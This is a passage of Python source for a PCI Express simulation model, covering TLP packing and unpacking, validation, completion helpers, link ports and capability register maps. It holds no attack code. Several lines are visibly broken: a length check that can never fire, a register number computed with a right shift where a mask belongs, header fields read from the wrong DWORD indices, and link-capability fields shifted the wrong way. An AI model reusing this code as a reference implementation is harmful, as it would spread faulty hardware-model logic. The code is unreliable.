self.tag = tlp.tag\n self.first_be = tlp.first_be\n self.last_be = tlp.last_be\n self.lower_address = tlp.lower_address\n self.address = tlp.address\n self.register_number = tlp.register_number\n self.data = tlp.data\n\n @property\n def fmt_type(self):\n return (self.fmt, self.type)\n\n @fmt_type.setter\n def fmt_type(self, val):\n self.fmt, self.type = val\n\n @property\n def completer_id(self):\n return self._completer_id\n \n @completer_id.setter\n def completer_id(self, val):\n self._completer_id = PcieId(val)\n\n @property\n def requester_id(self):\n return self._requester_id\n \n @requester_id.setter\n def requester_id(self, val):\n self._requester_id = PcieId(val)\n\n @property\n def dest_id(self):\n return self._dest_id\n \n @dest_id.setter\n def dest_id(self, val):\n self._dest_id = PcieId(val)\n\n def check(self):\n \"\"\"Validate TLP\"\"\"\n ret = True\n if self.fmt == FMT_3DW_DATA or self.fmt == FMT_4DW_DATA:\n if self.length != len(self.data):\n print(\"TLP validation failed, length field does not match data: %s\" % repr(self))\n ret = False\n if 0 > self.length > 1024:\n print(\"TLP validation failed, length out of range: %s\" % repr(self))\n ret = False\n if (self.fmt_type == TLP_MEM_READ or self.fmt_type == TLP_MEM_READ_64 or\n self.fmt_type == TLP_MEM_READ_LOCKED or self.fmt_type == TLP_MEM_READ_LOCKED_64 or\n self.fmt_type == TLP_MEM_WRITE or self.fmt_type == TLP_MEM_WRITE_64):\n if self.length*4 > 0x1000 - (self.address & 0xfff):\n print(\"TLP validation failed, request crosses 4K boundary: %s\" % repr(self))\n ret = False\n if (self.fmt_type == TLP_IO_READ or self.fmt_type == TLP_IO_WRITE):\n if self.length != 1:\n print(\"TLP validation failed, invalid length for IO request: %s\" % repr(self))\n ret = False\n if self.last_be != 0:\n print(\"TLP validation failed, invalid last BE for IO request: %s\" % repr(self))\n ret = False\n if (self.fmt_type == TLP_CPL_DATA):\n if (self.byte_count + (self.lower_address&3) + 3) < self.length*4:\n print(\"TLP validation failed, completion byte count too small: %s\" % repr(self))\n ret = False\n return ret\n\n def set_completion(self, tlp, completer_id, has_data=False, status=CPL_STATUS_SC):\n \"\"\"Prepare completion for TLP\"\"\"\n if has_data:\n self.fmt_type = TLP_CPL_DATA\n else:\n self.fmt_type = TLP_CPL\n self.requester_id = tlp.requester_id\n self.completer_id = completer_id\n self.status = status\n self.attr = tlp.attr\n self.tag = tlp.tag\n self.tc = tlp.tc\n\n def set_completion_data(self, tlp, completer_id):\n \"\"\"Prepare completion with data for TLP\"\"\"\n self.set_completion(tlp, completer_id, True)\n\n def set_ur_completion(self, tlp, completer_id):\n \"\"\"Prepare unsupported request (UR) completion for TLP\"\"\"\n self.set_completion(tlp, completer_id, False, CPL_STATUS_UR)\n\n def set_crs_completion(self, tlp, completer_id):\n \"\"\"Prepare configuration request retry status (CRS) completion for TLP\"\"\"\n self.set_completion(tlp, completer_id, False, CPL_STATUS_CRS)\n\n def set_ca_completion(self, tlp, completer_id):\n \"\"\"Prepare completer abort (CA) completion for TLP\"\"\"\n self.set_completion(tlp, completer_id, False, CPL_STATUS_CA)\n\n def set_be(self, addr, length):\n \"\"\"Compute byte enables, DWORD address, and DWORD length from byte address and length\"\"\"\n self.address = addr & ~3\n first_pad = addr % 4\n last_pad = 3 - (addr+length-1) % 4\n self.length = math.ceil((length+first_pad+last_pad)/4)\n self.first_be = (0xf << first_pad) & 0xf\n self.last_be = (0xf >> last_pad)\n if self.length == 
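The set_*_completion helpers above differ only in the status code and data flag; a hedged sketch of how a completer might choose among them (the dispatch logic and names are hypothetical, and data length is assumed DWORD-aligned):

def complete(request, completer_id, data=None, unsupported=False):
    cpl = TLP()
    if unsupported:
        cpl.set_ur_completion(request, completer_id)    # status CPL_STATUS_UR
    elif data is not None:
        cpl.set_completion_data(request, completer_id)  # CplD, status CPL_STATUS_SC
        cpl.set_data(data)
        cpl.byte_count = len(data)
        cpl.length = len(cpl.data)                      # length counts DWORDs
    else:
        cpl.set_completion(request, completer_id)       # Cpl without data
    return cpl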
1:\n self.first_be &= self.last_be\n self.last_be = 0\n\n return (first_pad, last_pad)\n\n def set_data(self, data):\n \"\"\"Set DWORD data from byte data\"\"\"\n self.data = []\n for k in range(0, len(data), 4):\n self.data.append(struct.unpack('> 32) & 0xffffffff\n pkt.append(l)\n l |= self.address & 0xfffffffc\n pkt.append(l)\n elif (self.fmt_type == TLP_CPL or self.fmt_type == TLP_CPL_DATA or\n self.fmt_type == TLP_CPL_LOCKED or self.fmt_type == TLP_CPL_LOCKED_DATA):\n l = self.byte_count & 0xfff\n l |= (self.bcm & 1) << 12\n l |= (self.status & 0x7) << 13\n l |= int(self.completer_id) << 16\n pkt.append(l)\n l = self.lower_address & 0x7f\n l |= (self.tag & 0xff) << 8\n l |= int(self.requester_id) << 16\n pkt.append(l)\n else:\n raise Exception(\"Unknown TLP type\")\n\n if self.fmt == FMT_3DW_DATA or self.fmt == FMT_4DW_DATA:\n pkt.extend(self.data)\n\n return pkt\n\n def unpack(self, pkt):\n \"\"\"Unpack TLP from DWORD array\"\"\"\n self.length = pkt[0] & 0x3ff\n self.at = (pkt[0] >> 10) & 0x3\n self.attr = (pkt[0] >> 12) & 0x3\n self.ep = (pkt[0] >> 14) & 1\n self.td = (pkt[0] >> 15) & 1\n self.th = (pkt[0] >> 16) & 1\n self.attr |= (pkt[0] >> 16) & 0x4\n self.tc = (pkt[0] >> 20) & 0x7\n self.type = (pkt[0] >> 24) & 0x1f\n self.fmt = (pkt[0] >> 29) & 0x7\n\n if self.fmt == FMT_3DW_DATA or self.fmt == FMT_4DW_DATA:\n if self.length == 0:\n self.length = 1024\n\n if (self.fmt_type == TLP_CFG_READ_0 or self.fmt_type == TLP_CFG_WRITE_0 or\n self.fmt_type == TLP_CFG_READ_1 or self.fmt_type == TLP_CFG_WRITE_1 or\n self.fmt_type == TLP_MEM_READ or self.fmt_type == TLP_MEM_READ_64 or\n self.fmt_type == TLP_MEM_READ_LOCKED or self.fmt_type == TLP_MEM_READ_LOCKED_64 or\n self.fmt_type == TLP_MEM_WRITE or self.fmt_type == TLP_MEM_WRITE_64 or\n self.fmt_type == TLP_IO_READ or self.fmt_type == TLP_IO_WRITE):\n self.first_be = pkt[1] & 0xf\n self.last_be = (pkt[1] >> 4) & 0xf\n self.tag = (pkt[1] >> 8) & 0xff\n self.requester_id = PcieId.from_int(pkt[1] >> 16)\n\n if (self.fmt_type == TLP_CFG_READ_0 or self.fmt_type == TLP_CFG_WRITE_0 or\n self.fmt_type == TLP_CFG_READ_1 or self.fmt_type == TLP_CFG_WRITE_1):\n self.register_number = (pkt[2] >> 2) >> 0x3ff\n self.dest_id = PcieId.from_int(pkt[2] >> 16)\n elif self.fmt == FMT_3DW or self.fmt == FMT_3DW_DATA:\n self.address = pkt[3] & 0xfffffffc\n elif self.fmt == FMT_4DW or self.fmt == FMT_4DW_DATA:\n self.address = (pkt[4] & 0xffffffff) << 32 | pkt[4] & 0xfffffffc\n elif (self.fmt_type == TLP_CPL or self.fmt_type == TLP_CPL_DATA or\n self.fmt_type == TLP_CPL_LOCKED or self.fmt_type == TLP_CPL_LOCKED_DATA):\n self.byte_count = pkt[1] & 0xfff\n self.bcm = (pkt[1] >> 12) & 1\n self.status = (pkt[1] >> 13) & 0x7\n self.completer_id = PcieId.from_int(pkt[1] >> 16)\n self.lower_address = pkt[2] & 0x7f\n self.tag = (pkt[2] >> 8) & 0xff\n self.requester_id = PcieId.from_int(pkt[2] >> 16)\n\n if self.byte_count == 0:\n self.byte_count = 4096\n else:\n raise Exception(\"Unknown TLP type\")\n\n if self.fmt == FMT_3DW_DATA:\n self.data = pkt[3:]\n elif self.fmt == FMT_4DW_DATA:\n self.data = pkt[4:]\n\n return self\n\n def __eq__(self, other):\n if isinstance(other, TLP):\n return (\n self.data == other.data and\n self.fmt == other.fmt and\n self.type == other.type and\n self.tc == other.tc and\n self.td == other.td and\n self.ep == other.ep and\n self.attr == other.attr and\n self.at == other.at and\n self.length == other.length and\n self.completer_id == other.completer_id and\n self.status == other.status and\n self.bcm == other.bcm and\n self.byte_count == 
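A worked example of the byte-enable arithmetic in set_be above: a 5-byte access at byte address 0x1002 becomes a 2-DWORD request with partial first/last byte enables. Assumes the TLP class above:

tlp = TLP()
first_pad, last_pad = tlp.set_be(0x1002, 5)
# first_pad = 0x1002 % 4 = 2        -> first_be = (0xf << 2) & 0xf = 0b1100
# last_pad  = 3 - (0x1006 % 4) = 1  -> last_be  =  0xf >> 1       = 0b0111
# DWORD length = ceil((5 + 2 + 1) / 4) = 2 at DWORD-aligned address 0x1000
assert (tlp.address, tlp.length) == (0x1000, 2)
assert (tlp.first_be, tlp.last_be) == (0b1100, 0b0111)
assert (first_pad, last_pad) == (2, 1)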
other.byte_count and\n self.requester_id == other.requester_id and\n self.dest_id == other.dest_id and\n self.tag == other.tag and\n self.first_be == other.first_be and\n self.last_be == other.last_be and\n self.lower_address == other.lower_address and\n self.address == other.address and\n self.register_number == other.register_number\n )\n return False\n\n def __repr__(self):\n return (\n ('TLP(data=[%s], ' % ', '.join(hex(x) for x in self.data)) +\n ('fmt=0x%x, ' % self.fmt) +\n ('type=0x%x, ' % self.type) +\n ('tc=0x%x, ' % self.tc) +\n ('th=0x%x, ' % self.th) +\n ('td=0x%x, ' % self.td) +\n ('ep=0x%x, ' % self.ep) +\n ('attr=0x%x, ' % self.attr) +\n ('at=0x%x, ' % self.at) +\n ('length=0x%x, ' % self.length) +\n ('completer_id=%s, ' % repr(self.completer_id)) +\n ('status=0x%x, ' % self.status) +\n ('bcm=0x%x, ' % self.bcm) +\n ('byte_count=0x%x, ' % self.byte_count) +\n ('requester_id=%s, ' % repr(self.requester_id)) +\n ('dest_id=%s, ' % repr(self.dest_id)) +\n ('tag=0x%x, ' % self.tag) +\n ('first_be=0x%x, ' % self.first_be) +\n ('last_be=0x%x, ' % self.last_be) +\n ('lower_address=0x%x, ' % self.lower_address) +\n ('address=0x%x, ' % self.address) +\n ('register_number=0x%x)' % self.register_number)\n )\n\n\nclass Port(object):\n \"\"\"Basic port\"\"\"\n def __init__(self, parent=None, rx_handler=None):\n self.parent = parent\n self.other = None\n self.rx_handler = rx_handler\n\n self.tx_queue = []\n self.tx_scheduled = False\n\n self.max_speed = 3\n self.max_width = 16\n self.port_delay = 5\n\n self.cur_speed = 1\n self.cur_width = 1\n self.link_delay = 0\n\n def connect(self, port):\n if isinstance(port, Port):\n self._connect(port)\n else:\n port.connect(self)\n\n def _connect(self, port):\n if self.other is not None:\n raise Exception(\"Already connected\")\n port._connect_int(self)\n self._connect_int(port)\n\n def _connect_int(self, port):\n if self.other is not None:\n raise Exception(\"Already connected\")\n self.other = port\n self.cur_speed = min(self.max_speed, port.max_speed)\n self.cur_width = min(self.max_width, port.max_width)\n self.link_delay = self.port_delay + port.port_delay\n\n def send(self, tlp):\n self.tx_queue.append(tlp)\n if not self.tx_scheduled:\n # schedule transmit\n yield self.transmit(), None\n self.tx_scheduled = True\n\n def transmit(self):\n if self.tx_queue:\n # schedule transmit\n tlp = self.tx_queue.pop(0)\n d = tlp.get_wire_size()*8/(PCIE_GEN_RATE[self.cur_speed]*self.cur_width)\n yield delay(int(d))\n yield self.transmit(), None\n yield delay(int(self.link_delay))\n yield self._transmit(tlp)\n else:\n self.tx_scheduled = False\n\n def _transmit(self, tlp):\n if self.other is None:\n raise Exception(\"Port not connected\")\n yield from self.other.ext_recv(tlp)\n\n def ext_recv(self, tlp):\n if self.rx_handler is None:\n raise Exception(\"Receive handler not set\")\n yield from self.rx_handler(tlp)\n\n\nclass BusPort(Port):\n \"\"\"Port for root of bus interconnection, broadcasts TLPs to all connected ports\"\"\"\n def __init__(self, parent=None, rx_handler=None):\n super(BusPort, self).__init__(parent, rx_handler)\n\n self.other = []\n\n def _connect(self, port):\n if port in self.other:\n raise Exception(\"Already connected\")\n port._connect_int(self)\n self._connect_int(port)\n\n def _connect_int(self, port):\n if port in self.other:\n raise Exception(\"Already connected\")\n self.other.append(port)\n self.cur_speed = min(self.max_speed, port.max_speed)\n self.cur_width = min(self.max_width, port.max_width)\n self.link_delay = 
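Port.transmit above models serialization time as TLP size in bits divided by per-lane rate times width, with PCIE_GEN_RATE already folding in the 8b/10b or 128b/130b coding overhead. A quick arithmetic sketch in the simulation's time units (the wire size here is a hypothetical estimate):

cur_speed, cur_width = 3, 4              # hypothetical gen3 x4 link
wire_bytes = (3 + 128 // 4) * 4          # assumed: 3DW header + 128 B payload
d = wire_bytes * 8 / (PCIE_GEN_RATE[cur_speed] * cur_width)
print(round(d, 1))                       # ~35.5: bits / (per-lane rate * lanes)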
self.port_delay + port.port_delay\n\n def _transmit(self, tlp):\n if not self.other:\n raise Exception(\"Port not connected\")\n for p in self.other:\n yield from p.ext_recv(TLP(tlp))\n\n\nclass PMCapability(object):\n \"\"\"Power Management capability\"\"\"\n def __init__(self, *args, **kwargs):\n super(PMCapability, self).__init__(*args, **kwargs)\n\n # Power management capability registers\n self.pm_capabilities = 0\n self.pm_control_status = 0\n self.pm_data = 0\n\n self.register_capability(PM_CAP_ID, PM_CAP_LEN, self.read_pm_cap_register, self.write_pm_cap_register)\n\n \"\"\"\n PCI Power Management Capability\n\n 31 0\n +---------------------------------+----------------+----------------+\n | PM Capabilities | Next Cap | PM Cap | 0 0x00\n +----------------+----------------+----------------+----------------+\n | PM Data | | PM Control/Status | 1 0x04\n +----------------+----------------+---------------------------------+\n \"\"\"\n def read_pm_cap_register(self, reg):\n if reg == 0: return self.pm_capabilities << 16\n elif reg == 1: return (self.pm_data << 24) | self.pm_control_status\n\n def write_pm_cap_register(self, reg, data, mask):\n # TODO\n pass\n\n\nclass PCIECapability(object):\n \"\"\"PCI Express capability\"\"\"\n def __init__(self, *args, **kwargs):\n super(PCIECapability, self).__init__(*args, **kwargs)\n\n # PCIe capability registers\n # PCIe capabilities\n self.pcie_capability_version = 2\n self.pcie_device_type = 0\n self.pcie_slot_implemented = False\n self.interrupt_message_number = 0\n # Device capabilities\n self.max_payload_size_supported = 0x5\n self.phantom_functions_supported = 0\n self.extended_tag_supported = True\n self.endpoint_l0s_acceptable_latency = 0x7\n self.endpoint_l1_acceptable_latency = 0x7\n self.role_based_error_reporting = True # TODO check ECN\n self.captured_slot_power_limit_value = 0\n self.captured_slot_power_limit_scale = 0\n self.function_level_reset_capability = False\n # Device control\n self.correctable_error_reporting_enable = False\n self.non_fatal_error_reporting_enable = False\n self.fatal_error_reporting_enable = False\n self.unsupported_request_reporting_enable = False\n self.enable_relaxed_ordering = True\n self.max_payload_size = 0x0\n self.extended_tag_field_enable = False\n self.phantom_functions_enable = False\n self.aux_power_pm_enable = False\n self.enable_no_snoop = True\n self.max_read_request_size = 0x2\n # Device status\n self.correctable_error_detected = False\n self.nonfatal_error_detected = False\n self.fatal_error_detected = False\n self.unsupported_request_detected = False\n self.aux_power_detected = False\n self.transactions_pending = False\n # Link capabilities\n self.max_link_speed = 0\n self.max_link_width = 0\n self.aspm_support = 0\n self.l0s_exit_latency = 0\n self.l1_exit_latency = 0\n self.clock_power_management = False\n self.surprise_down_error_reporting_capability = False\n self.data_link_layer_link_active_reporting_capable = False\n self.link_bandwidth_notification_capability = False\n self.aspm_optionality_compliance = False\n self.port_number = 0\n # Link control\n self.aspm_control = 0\n self.read_completion_boundary = False\n self.link_disable = False\n self.common_clock_configuration = False\n self.extended_synch = False\n self.enable_clock_power_management = False\n self.hardware_autonomous_width_disable = False\n self.link_bandwidth_management_interrupt_enable = False\n self.link_autonomous_bandwidth_interrupt_enable = False\n # Link status\n self.current_link_speed = 0\n 
self.negotiated_link_width = 0\n self.link_training = False\n self.slot_clock_configuration = False\n self.data_link_layer_link_active = False\n self.link_bandwidth_management_status = False\n self.link_autonomous_bandwidth_status = False\n # Slot capabilities\n self.attention_button_present = False\n self.power_controller_present = False\n self.mrl_sensor_present = False\n self.attention_indicator_present = False\n self.power_indicator_present = False\n self.hot_plug_surprise = False\n self.hot_plug_capable = False\n self.slot_power_limit_value = 0\n self.slot_power_limit_scale = 0\n self.electromechanical_interlock_present = False\n self.no_command_completed_support = False\n self.physical_slot_number = 0\n # Slot control\n self.attention_button_pressed_enable = False\n self.power_fault_detected_enable = False\n self.mrl_sensor_changed_enable = False\n self.presence_detect_changed_enable = False\n self.command_completed_interrupt_enable = False\n self.hot_plug_interrupt_enable = False\n self.attention_indicator_control = 0\n self.power_indicator_control = 0\n self.power_controller_control = False\n self.electromechanical_interlock_control = False\n self.data_link_layer_state_changed_enable = False\n # Slot status\n self.attention_button_pressed = False\n self.power_fault_detected = False\n self.mrl_sensor_changed = False\n self.presence_detect_changed = False\n self.command_completed = False\n self.mrl_sensor_state = False\n self.presence_detect_state = False\n self.electromechanical_interlock_status = False\n self.data_link_layer_state_changed = False\n # Root control\n self.system_error_on_correctable_error_enable = False\n self.system_error_on_non_fatal_error_enable = False\n self.system_error_on_fatal_error_enable = False\n self.pme_interrupt_enable = False\n self.crs_software_visibility_enable = False\n # Root capabilities\n self.crs_software_visibility = False\n # Root status\n self.pme_requester_id = 0\n self.pme_status = False\n self.pme_pending = False\n # Device capabilities 2\n self.completion_timeout_ranges_supported = 0\n self.completion_timeout_disable_supported = False\n self.ari_forwarding_supported = False\n self.atomic_op_forwarding_supported = False\n self.atomic_op_32_bit_completer_supported = False\n self.atomic_op_64_bit_completer_supported = False\n self.cas_128_bit_completer_supported = False\n self.no_ro_enabled_pr_pr_passing = False\n self.ltr_mechanism_supported = False\n self.tph_completer_supported = 0\n self.obff_supported = 0\n self.extended_fmt_field_supported = False\n self.end_end_tlp_prefix_supported = False\n self.max_end_end_tlp_prefix = 0\n # Device control 2\n self.completion_timeout_value = 0\n self.completion_timeout_disable = False\n self.ari_forwarding_enable = False\n self.atomic_op_requester_enable = False\n self.atomic_op_egress_blocking = False\n self.ido_request_enable = False\n self.ido_completion_enable = False\n self.ltr_mechanism_enable = False\n self.obff_enable = 0\n self.end_end_tlp_prefix_blocking = False\n # Device status 2\n # Link capabilities 2\n self.supported_link_speeds = 0\n self.crosslink_supported = False\n # Link control 2\n self.target_link_speed = 0\n self.enter_compliance = False\n self.hardware_autonomous_speed_disable = False\n self.selectable_de_emphasis = False\n self.transmit_margin = 0\n self.enter_modified_compliance = False\n self.compliance_sos = False\n self.compliance_preset_de_emphasis = 0\n # Link status 2\n self.current_de_emphasis_level = False\n self.equalization_complete = False\n 
self.equalization_phase_1_successful = False\n self.equalization_phase_2_successful = False\n self.equalization_phase_3_successful = False\n self.link_equalization_request = False\n # Slot capabilities 2\n # Slot control 2\n # Slot status 2\n\n self.register_capability(PCIE_CAP_ID, PCIE_CAP_LEN, self.read_pcie_cap_register, self.write_pcie_cap_register)\n\n \"\"\"\n PCIe Capability\n\n 31 0\n +---------------------------------+----------------+----------------+\n | PCIe Capabilities | Next Cap | PCIe Cap | 0 0x00\n +---------------------------------+----------------+----------------+\n | Device Capabilities | 1 0x04\n +---------------------------------+---------------------------------+\n | Device Status | Device Control | 2 0x08\n +---------------------------------+----------------+----------------+\n | Link Capabilities | 3 0x0C\n +---------------------------------+---------------------------------+\n | Link Status | Link Control | 4 0x10\n +---------------------------------+---------------------------------+\n | Slot Capabilities | 5 0x14\n +---------------------------------+---------------------------------+\n | Slot Status | Slot Control | 6 0x18\n +---------------------------------+---------------------------------+\n | Root Capabilities | Root Control | 7 0x1C\n +---------------------------------+---------------------------------+\n | Root status | 8 0x20\n +---------------------------------+---------------------------------+\n | Device Capabilities 2 | 9 0x24\n +---------------------------------+---------------------------------+\n | Device Status 2 | Device Control 2 | 10 0x28\n +---------------------------------+----------------+----------------+\n | Link Capabilities 2 | 11 0x2C\n +---------------------------------+---------------------------------+\n | Link Status 2 | Link Control 2 | 12 0x30\n +---------------------------------+---------------------------------+\n | Slot Capabilities 2 | 13 0x34\n +---------------------------------+---------------------------------+\n | Slot Status 2 | Slot Control 2 | 14 0x38\n +---------------------------------+---------------------------------+\n \"\"\"\n def read_pcie_cap_register(self, reg):\n if reg == 0:\n # PCIe capabilities\n val = 2 << 16\n val |= (self.pcie_device_type & 0xf) << 20\n if self.pcie_slot_implemented: val |= 1 << 24\n val |= (self.interrupt_message_number & 0x1f) << 25\n return val\n elif reg == 1:\n # Device capabilities\n val = self.max_payload_size_supported & 0x7\n val |= (self.phantom_functions_supported & 0x3) << 3\n if self.extended_tag_supported: val |= 1 << 5\n val |= (self.endpoint_l0s_acceptable_latency & 0x7) << 6\n val |= (self.endpoint_l1_acceptable_latency & 7) << 9\n if self.role_based_error_reporting: val |= 1 << 15\n val |= (self.captured_slot_power_limit_value & 0xff) << 18\n val |= (self.captured_slot_power_limit_scale & 0x3) << 26\n if self.function_level_reset_capability: val |= 1 << 28\n return val\n elif reg == 2:\n val = 0\n # Device control\n if self.correctable_error_reporting_enable: val |= 1 << 0\n if self.non_fatal_error_reporting_enable: val |= 1 << 1\n if self.fatal_error_reporting_enable: val |= 1 << 2\n if self.unsupported_request_reporting_enable: val |= 1 << 3\n if self.enable_relaxed_ordering: val |= 1 << 4\n val |= (self.max_payload_size & 0x7) << 5\n if self.extended_tag_field_enable: val |= 1 << 8\n if self.phantom_functions_enable: val |= 1 << 9\n if self.aux_power_pm_enable: val |= 1 << 10\n if self.enable_no_snoop: val |= 1 << 11\n val |= (self.max_read_request_size & 0x7) << 
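The register readers below hand-pack many boolean and multi-bit fields with shifts and masks; the same pattern can be stated once as a generic helper (hypothetical, not part of the classes above):

def pack_fields(fields):
    # fields: iterable of (value, width_in_bits, bit_offset) packed into one word
    val = 0
    for value, width, offset in fields:
        val |= (int(value) & ((1 << width) - 1)) << offset
    return val

# e.g. the PCIe capabilities register body from read_pcie_cap_register (reg 0):
val = pack_fields([
    (2, 4, 16),   # capability version
    (0, 4, 20),   # device/port type
    (1, 1, 24),   # slot implemented
    (0, 5, 25),   # interrupt message number
])
assert val == (2 << 16) | (1 << 24)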
12\n # Device status\n if self.correctable_error_detected: val |= 1 << 16\n if self.nonfatal_error_detected: val |= 1 << 17\n if self.fatal_error_detected: val |= 1 << 18\n if self.unsupported_request_detected: val |= 1 << 19\n if self.aux_power_detected: val |= 1 << 20\n if self.transactions_pending: val |= 1 << 21\n return val\n elif reg == 3:\n # Link capabilities\n val = self.max_link_speed & 0xf\n val |= (self.max_link_width & 0x3f) >> 4\n val |= (self.aspm_support & 0x3) >> 10\n val |= (self.l0s_exit_latency & 0x7) >> 12\n val |= (self.l1_exit_latency & 0x7) >> 15\n if self.clock_power_management: val |= 1 << 18\n if self.surprise_down_error_reporting_capability: val |= 1 << 19\n if self.data_link_layer_link_active_reporting_capable: val |= 1 << 20\n if self.link_bandwidth_notification_capability: val |= 1 << 21\n if self.aspm_optionality_compliance: val |= 1 << 22\n val |= (self.port_number & 0xff) << 24\n return val\n elif reg == 4:\n # Link control\n val = self.aspm_control & 0x3\n if self.read_completion_boundary: val |= 1 << 3\n if self.link_disable: val |= 1 << 4\n if self.common_clock_configuration: val |= 1 << 6\n if self.extended_synch: val |= 1 << 7\n if self.enable_clock_power_management: val |= 1 << 8\n if self.hardware_autonomous_width_disable: val |= 1 << 9\n if self.link_bandwidth_management_interrupt_enable: val |= 1 << 10\n if self.link_autonomous_bandwidth_interrupt_enable: val |= 1 << 11\n # Link status\n val |= (self.current_link_speed & 0xf) << 16\n val |= (self.negotiated_link_width & 0x3f) << 20\n if self.link_training: val |= 1 << 27\n if self.slot_clock_configuration: val |= 1 << 28\n if self.data_link_layer_link_active: val |= 1 << 29\n if self.link_bandwidth_management_status: val |= 1 << 30\n if self.link_autonomous_bandwidth_status: val |= 1 << 31\n return val\n elif reg == 5:\n # Slot capabilities\n val = 0\n if self.attention_button_present: val |= 1\n if self.power_controller_present: val |= 1 << 1\n if self.mrl_sensor_present: val |= 1 << 2\n if self.attention_indicator_present: val |= 1 << 3\n if self.power_indicator_present: val |= 1 << 4\n if self.hot_plug_surprise: val |= 1 << 5\n if self.hot_plug_capable: val |= 1 << 6\n val |= (self.slot_power_limit_value & 0xff) << 7\n val |= (self.slot_power_limit_scale & 0x3) << 15\n if self.electromechanical_interlock_present: val |= 1 << 17\n if self.no_command_completed_support: val |= 1 << 18\n val |= (self.physical_slot_number & 0x1fff) << 19\n return val\n elif reg == 6:\n # Slot control\n val = 0\n if self.attention_button_pressed_enable: val |= 1 << 0\n if self.power_fault_detected_enable: val |= 1 << 1\n if self.mrl_sensor_changed_enable: val |= 1 << 2\n if self.presence_detect_changed_enable: val |= 1 << 3\n if self.command_completed_interrupt_enable: val |= 1 << 4\n if self.hot_plug_interrupt_enable: val |= 1 << 5\n val |= (self.attention_indicator_control & 0x3) << 6\n val |= (self.power_indicator_control & 0x3) << 8\n if self.power_controller_control: val |= 1 << 10\n if self.electromechanical_interlock_control: val |= 1 << 11\n if self.data_link_layer_state_changed_enable: val |= 1 << 12\n # Slot status\n if self.attention_button_pressed: val |= 1 << 16\n if self.power_fault_detected: val |= 1 << 17\n if self.mrl_sensor_changed: val |= 1 << 18\n if self.presence_detect_changed: val |= 1 << 19\n if self.command_completed: val |= 1 << 20\n if self.mrl_sensor_state: val |= 1 << 21\n if self.presence_detect_state: val |= 1 << 22\n if self.electromechanical_interlock_status: val |= 1 << 23\n if 
self.data_link_layer_state_changed: val |= 1 << 24\n return val\n elif reg == 7:\n # Root control\n val = 0\n if self.system_error_on_correctable_error_enable: val |= 1 << 0\n if self.system_error_on_non_fatal_error_enable: val |= 1 << 1\n if self.system_error_on_fatal_error_enable: val |= 1 << 2\n if self.pme_interrupt_enable: val |= 1 << 3\n if self.crs_software_visibility_enable: val |= 1 << 4\n # Root capabilities\n if self.crs_software_visibility: val |= 1 << 16\n return val\n elif reg == 8:\n # Root status\n val = self.pme_requester_id & 0xffff\n if self.pme_status: val |= 1 << 16\n if self.pme_pending: val |= 1 << 17\n return val\n elif reg == 9:\n # Device capabilities 2\n val = self.completion_timeout_ranges_supported & 0xf\n if self.completion_timeout_disable_supported: val |= 1 << 4\n if self.ari_forwarding_supported: val |= 1 << 5\n if self.atomic_op_forwarding_supported: val |= 1 << 6\n if self.atomic_op_32_bit_completer_supported: val |= 1 << 7\n if self.atomic_op_64_bit_completer_supported: val |= 1 << 8\n if self.cas_128_bit_completer_supported: val |= 1 << 9\n if self.no_ro_enabled_pr_pr_passing: val |= 1 << 10\n if self.ltr_mechanism_supported: val |= 1 << 11\n val |= (self.tph_completer_supported & 0x3) << 12\n val |= (self.obff_supported & 0x3) << 18\n if self.extended_fmt_field_supported: val |= 1 << 20\n if self.end_end_tlp_prefix_supported: val |= 1 << 21\n val |= (self.max_end_end_tlp_prefix & 0x3) << 22\n return val\n elif reg == 10:\n # Device control 2\n val = self.completion_timeout_value & 0xf\n if self.completion_timeout_disable: val |= 1 << 4\n if self.ari_forwarding_enable: val |= 1 << 5\n if self.atomic_op_requester_enable: val |= 1 << 6\n if self.atomic_op_egress_blocking: val |= 1 << 7\n if self.ido_request_enable: val |= 1 << 8\n if self.ido_completion_enable: val |= 1 << 9\n if self.ltr_mechanism_enable: val |= 1 << 10\n val |= (self.obff_enable & 0x3) << 13\n if self.end_end_tlp_prefix_blocking: val |= 1 << 15\n # Device status 2\n return val\n elif reg == 11:\n # Link capabilities 2\n val = (self.supported_link_speeds & 0x7f) << 1\n if self.crosslink_supported: val |= 1 << 8\n return val\n elif reg == 12:\n # Link control 2\n val = self.target_link_speed & 0xf\n if self.enter_compliance: val |= 1 << 4\n if self.hardware_autonomous_speed_disable: val |= 1 << 5\n if self.selectable_de_emphasis: val |= 1 << 6\n val |= (self.transmit_margin & 0x7) << 7\n if self.enter_modified_compliance: val |= 1 << 10\n if self.compliance_sos: val |= 1 << 11\n val |= (self.compliance_preset_de_emphasis & 0xf) << 12\n # Link status 2\n if self.current_de_emphasis_level: val |= 1 << 16\n if self.equalization_complete: val |= 1 << 17\n if self.equalization_phase_1_successful: val |= 1 << 18\n if self.equalization_phase_2_successful: val |= 1 << 19\n if self.equalization_phase_3_successful: val |= 1 << 20\n if self.link_equalization_request: val |= 1 << 21\n return val\n else:\n return 0\n\n def write_pcie_cap_register(self, reg, data, mask):\n if reg == 2:\n # Device control\n if mask & 0x1: self.correctable_error_reporting_enable = (data & 1 << 0 != 0)\n if mask & 0x1: self.non_fatal_error_reporting_enable = (data & 1 << 1 != 0)\n if mask & 0x1: self.fatal_error_reporting_enable = (data & 1 << 2 != 0)\n if mask & 0x1: self.unsupported_request_reporting_enable = (data & 1 << 3 != 0)\n if mask & 0x1: self.enable_relaxed_ordering = (data & 1 << 4 != 0)\n if mask & 0x1: self.max_payload_size = (data >> 5) & 0x7\n if mask & 0x2: self.extended_tag_field_enable = (data & 1 << 8 
!= 0)\n if mask & 0x2: self.phantom_functions_enable = (data & 1 << 9 != 0)\n if mask & 0x2: self.aux_power_pm_enable = (data & 1 << 10 != 0)\n if mask & 0x2: self.enable_no_snoop = (data & 1 << 11 != 0)\n if mask & 0x2: self.max_read_request_size = (data >> 12) & 0x7\n if mask & 0x2 and data & 1 << 15: self.initiate_function_level_reset()\n # Device status\n if mask & 0x4 and data & 1 << 16: self.correctable_error_detected = False\n if mask & 0x4 and data & 1 << 17: self.nonfatal_error_detected = False\n if mask & 0x4 and data & 1 << 18: self.fatal_error_detected = False\n if mask & 0x4 and data & 1 << 19: self.unsupported_request_detected = False\n if mask & 0x4 and data & 1 << 20: self.aux_power_detected = False\n if mask & 0x4 and data & 1 << 21: self.transactions_pending = False\n elif reg == 4:\n # Link control\n if mask & 0x1: self.aspm_control = data & 3\n if mask & 0x1: self.read_completion_boundary = (data & 1 << 4 != 0)\n if mask & 0x1 and data & 1 << 5: self.initiate_retrain_link()\n if mask & 0x1: self.common_clock_configuration = (data & 1 << 6 != 0)\n if mask & 0x1: self.extended_synch = (data & 1 << 7 != 